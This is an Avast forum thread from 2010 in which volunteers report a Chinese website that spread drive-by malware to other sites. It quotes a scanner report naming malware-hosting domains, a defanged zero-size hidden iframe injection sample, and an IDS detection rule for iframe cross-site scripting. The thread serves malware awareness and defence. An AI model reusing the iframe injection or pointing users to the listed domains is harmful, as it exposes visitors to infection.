Author Topic: Dangerous Chinese site with iFrame malware...  (Read 3265 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Dangerous Chinese site with iFrame malware...
« on: July 05, 2010, 09:33:20 PM »
Hi malware fighters,

See unmasked pirates report for 021web*com*cn
    Of the 217 pages we tested on the site 2 pages resulted in malicious software being downloaded and installed without user consent. The last time suspicious content was found on this site was on 2010-07-04.

    Malicious software includes 1116 exploits, 1101 scripting exploits, 5 trojans. Successful infection resulted in an average of 6 new processes on the target machine.

    Malicious software is hosted on 11 domains, including dwefsd.com/, 92mimi4.cn/, wdf345.3322.org/.

    This site was hosted on 1 network including AS4812 (CT).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, 021web.com.cn appeared to function as an intermediary for the infection of 246 site(s) including vannghevietnam.vn/, dongnai.gov.vn/, 1081.com.vn/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 185 domains, including vannghevietnam.vn/, dongnai.gov.vn/, vietbalo.vn/.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Infection details: Infection Details

MD5:    873fab89c387bd0d2225a5689f152e81
Infection Type:    IFRAME
Description:    A malicious IFRAME can source in content from web pages that attempt to fingerprint and exploit a browser vulnerability or client/OS vulnerability to cause a drive-by-download. Such IFRAMEs are typically invisible to users.
Code Length:    75 bytes
Code Sample:    
Top-level URL <iframe src=htxp://021web.com*cn/abo
ut.html width=0 height=0>
=== Triggered rule ===
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=Infection+Details++MD5%3A+%09873fab89c387bd0d2225a5689f152e81+Infection+Type%3A+%09IFRAME+Description%3A+%09A+malicious+IFRAME+can+source+in+content+from+web+pages+that+attempt+to+fingerprint+and+exploit+a+browser+vulnerability+or+client%2FOS+vulnerability+to+cause+a+drive-by-download.+Such+IFRAMEs+are+typically+invisible+to+users.+Code+Length%3A+%0975+bytes+Code+Sample%3A+%09+Top-level+URL+%3Ciframe+src%3Dhttp%3A%2F%2F021web.com.cn%2Fabo+ut.html+width%3D0+height%3D0%3E&ie=utf-8&oe=utf-8&aq=t If you give in this request -it is flagged by avast as: S:ScriptPE-inf [Trj]

iFrame detecting scan:
No zeroiframes detected!
Check took 11.38 seconds

(Level: 0) Url checked:
htxp://021web.com.cn
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://021web.com.cn/template/index_js.html
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://021web.com.cn/js/mainad.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://021web.com.cn//count/get_count.asp?action=all
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://s27.cnzz.com/stat.php?id=602762&web_id=602762 (suspicious code see attached image)
Zeroiframes detected on this site: 0
No ad codes identified

Avast Networkshield is your friend and protector here, because we cannot connect there:

polonus
« Last Edit: July 05, 2010, 09:35:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline superhacker

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 979
  • superhacker != super mario
Re: Dangerous Chinese site with iFrame malware...
« Reply #1 on: July 05, 2010, 09:45:11 PM »
God bless you polonus. 8)
Dreams don't die, they just fall asleep.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88899
  • No support PMs thanks
Re: Dangerous Chinese site with iFrame malware...
« Reply #2 on: July 05, 2010, 10:14:59 PM »
Do you not think it would be a good idea to keep such posts in a single topic making it easier to reference/find ?
A bit like the Updates, Interesting software, Security, etc. etc.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline superhacker

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 979
  • superhacker != super mario
Re: Dangerous Chinese site with iFrame malware...
« Reply #3 on: July 05, 2010, 10:19:57 PM »
It is good idea but i think if dont get stacked a small number will attach and see it,so it is nicer now.
Dreams don't die, they just fall asleep.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Dangerous Chinese site with iFrame malware...
« Reply #4 on: July 05, 2010, 10:29:16 PM »
Hi Superhacker,

We could also discuss the "%3C%69%66%" type of malware-code, you see where your two scripts are coming in handy now, my friend: WordPress software malcode: http://wordpress.org/support/topic/327326
http://cpansearch.perl.org/src/WORRALL/Net-Analysis-0.41/t/t1_google.hex
http://www.prevx.com/blog/132/Compromised-FTP-details-being-exploited-by-in-the-wild-malware.html

There are so many in-routes to an interesting malcode discussion, and we the posters do have to find the various patterns at once to do a "quick and dirty" for the victims,

for instance this script (with some 1,560 Google results), described here:
http://wam.dasient.com/wam/infection_library/e59265d71b18d86665437ab32d20436a/postfolkovs

polonus
« Last Edit: July 05, 2010, 10:35:02 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!